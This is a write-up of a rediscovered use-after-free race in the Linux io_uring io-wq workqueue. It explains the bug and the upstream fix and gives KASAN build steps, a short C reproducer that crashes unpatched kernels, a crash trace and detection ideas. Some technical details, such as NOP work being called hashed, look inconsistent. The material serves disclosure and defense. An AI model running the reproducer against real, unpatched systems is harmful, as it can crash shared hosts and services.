Linux io-wq UAF rediscovery

Use after free in io-wq, on the read of wq->hash_tail[index] during worker selection. Already fixed upstream in commit d6a2d7b04b5a. Stable kernels carrying the bug picked up the backport in their corresponding releases.

I rediscovered it independently. Writing it up here as a methodology note plus a working reproducer, not as a vulnerability announcement.

what's broken

io-wq is the workqueue subsystem inside io_uring. It manages a pool of worker threads that pick up async work submitted through SQEs. Hashed work, the kind tagged with IOSQE_ASYNC and bound to a particular hash bucket, gets routed for cache locality: work items with the same hash land on the same worker so caches stay warm across submissions.

The routing relies on wq->hash_tail[], an array on the workqueue, indexed by hash bucket. Each slot holds a pointer to the last work item enqueued for that bucket. On enqueue, io-wq reads hash_tail[bucket] to decide whether to chain the new work after an existing tail (locality preserved) or set up a fresh chain.

The lifetime of the pointer in hash_tail[bucket] is tied to the work item it points to. When that work item is freed, the slot is supposed to be cleared or replaced before any concurrent reader can see the dangling pointer.

There's a window between the free and the clear where a concurrent enqueue path reads the slot and gets back a pointer into freed slab memory. Slab allocators recycle memory quickly under load, and the poison the allocator writes into the freed region is what trips KASAN on the next read.

the race

Two contexts collide.

The teardown path: io_wq_exit_workers runs when a ring is being shut down. It drains outstanding work, frees the io_wq_work objects, and is supposed to clear the corresponding hash_tail slots. The clear is not atomic with respect to the free.

The submit path: io_wq_enqueue, reached from io_queue_iowq from io_req_task_submit, reads hash_tail[bucket] and decides what to do based on whether it sees a tail. If the read returns a freed pointer (because teardown freed the work but hasn't cleared the slot yet), enqueue dereferences it on the chain decision and KASAN trips.

The window is short. Under normal load it almost never opens. To open it reliably you need rapid ring teardown bursts overlapping with hashed work submission on adjacent rings or task_work flushes. The reproducer below structures workload to maximize that overlap.

what the patch does

Upstream fix d6a2d7b04b5a adds a check that the workqueue slot is live before reading hash_tail. The shape is a load with explicit memory ordering, paired with a release on the teardown side: teardown publishes the invalidation before the free becomes visible, and enqueue refuses to use a hash_tail value if the corresponding bucket has been marked dead.

The result is that the enqueue path either sees a valid pointer (it can deref) or sees the invalid sentinel (it bails to the slow path that does a fresh worker pick). Race window closed.

reproduction

Build an affected kernel with KASAN on. Affected kernels are 6.x prior to the d6a2d7b04b5a backport landing in the relevant stable line.

make defconfig
./scripts/config --enable CONFIG_KASAN \
                 --enable CONFIG_KASAN_INLINE \
                 --enable CONFIG_IO_URING \
                 --enable CONFIG_DEBUG_KERNEL
make -j"$(nproc)"

CONFIG_KASAN_INLINE gives you inline KASAN checks (faster, larger image) which catch the read at the access site rather than through a function call. Either inline or outline works for repro; inline produces a cleaner backtrace.

The reproducer is a small userspace program. It opens N rings, submits hashed NOP work concurrently from each, then tears them all down in a tight loop to force the teardown path to overlap with the submit path on adjacent rings.

#include <liburing.h>

#define RINGS 32
#define DEPTH 64

struct io_uring rings[RINGS];

for (int i = 0; i < RINGS; i++)
    io_uring_queue_init(DEPTH, &rings[i], 0);

for (int round = 0; round < 1000; round++) {
    for (int i = 0; i < RINGS; i++) {
        struct io_uring_sqe *sqe = io_uring_get_sqe(&rings[i]);
        io_uring_prep_nop(sqe);
        sqe->flags |= IOSQE_ASYNC;
        io_uring_submit(&rings[i]);
    }
    for (int i = 0; i < RINGS; i++)
        io_uring_queue_exit(&rings[i]);
    for (int i = 0; i < RINGS; i++)
        io_uring_queue_init(DEPTH, &rings[i], 0);
}

Pinning the process to a small CPU set (2 cores is plenty) makes the race more frequent by forcing teardown and submit work to interleave on the same kernel threads. Without pinning you may need several seconds before KASAN trips. With pinning the first round usually does it.

Under load, KASAN trips on the read of wq->hash_tail[index] in the io-wq worker selection path:

BUG: KASAN: slab-use-after-free in io_wq_enqueue+0x...
Read of size 8 at addr ffff888100abc010 by task repro/...

Call Trace:
  io_wq_enqueue                  // reads wq->hash_tail[bucket]
  io_queue_iowq                  // io_uring submit path
  io_req_task_submit             // task_work flush
  task_work_run
  exit_to_user_mode_loop
  ...

Allocated by task ...:
  kmem_cache_alloc
  io_wq_alloc_work
  ...

Freed by task ...:
  kmem_cache_free
  io_wq_exit_workers             // teardown frees prior tail
  io_wq_put_and_exit
  io_ring_exit_work
  process_one_work
  ...

The annotated frames show the shape: the submit side reader is in io_wq_enqueue, the freer is io_wq_exit_workers running from a different ring's teardown on the worker pool that's about to be reaped.

detection without KASAN

On a production kernel without KASAN compiled in, the bug shows up as a kernel oops or general protection fault on a wild pointer dereference inside the io-wq enqueue path. The crash signature varies because the freed slab can be either still zeroed, repurposed for another allocation, or carrying allocator debug poison.

Workloads that hit this in practice are containerized services with rapid io_uring ring lifecycles. Containers that fork, exec, and exit quickly. Services that cycle rings on configuration change. Worker pools that recreate the ring per request. Services that hold one ring open for the long term rarely trigger it.

If you operate kernels that aren't yet carrying the d6a2d7b04b5a backport, detection options are:

Crash signature matching on io_wq_enqueue+ frames in syslog with a wild pointer in RSI or RDI.
eBPF kprobe on io_wq_enqueue that validates the returned hash_tail pointer against the slab cache for io_wq_work. Flag when the pointer is in a freed slab.
Audit metrics on ring teardown rate. The class of services that hit this is the class that tears down rings hundreds of times per second under stress. That's the signal worth alerting on independently of the bug.

variants in adjacent code

The pattern is: an element of a pointer array read during enqueue, indexed by a key derived from the work, racing with a teardown path that frees the referenced object. I checked the obvious candidates in io-wq and a couple of places in io_uring outside io-wq after fingerprinting the primary site. Nothing else trips reliably under this harness, but the pattern is worth a grep across any worker pool code: arrays of struct io_wq_work * indexed by hash or bucket, similar arrays in io_uring for request queues and cancel tables.

The lifetime invariant that fails in all of these is the same. The array slot's lifetime is implicitly tied to the object it points to, and concurrent readers don't have a way to verify liveness before deref.

A more robust defense pattern for this class is to wrap the pointer in a tagged or versioned slot: each slot carries a generation counter that the reader can compare against the object's generation. Mismatch means stale, bail to slow path. That's heavier than the liveness check the upstream patch uses, but it's the better pattern if you have to do this in multiple places. The upstream fix took the lighter approach because it was localized to one site.

what this calibrated

The pipeline surfaced the candidate site from a diff against the upstream io-wq patch series, with no prior knowledge of the fix or its commit message. The same primitive ended up as both the pipeline's candidate and the upstream's actual fix target. That match is the calibration data point worth recording.

Time from "this looks like a candidate" to KASAN repro was short. Most of the time went into the harness, not the analysis. Once the workload shape was right (small rings, fast teardown, pinned CPUs), repro was reliable enough to drop into CI.

For a solo operation hunting kernel bugs, the metric that matters is time from candidate to repro. If the pipeline produces candidates faster than they can be harnessed and reproduced, the bottleneck shifts to bench time, which scales with effort more directly than analysis time scales with intuition. This rediscovery suggests the pipeline is operating in the right regime for kernel work.

patch

Upstream fix: d6a2d7b04b5a.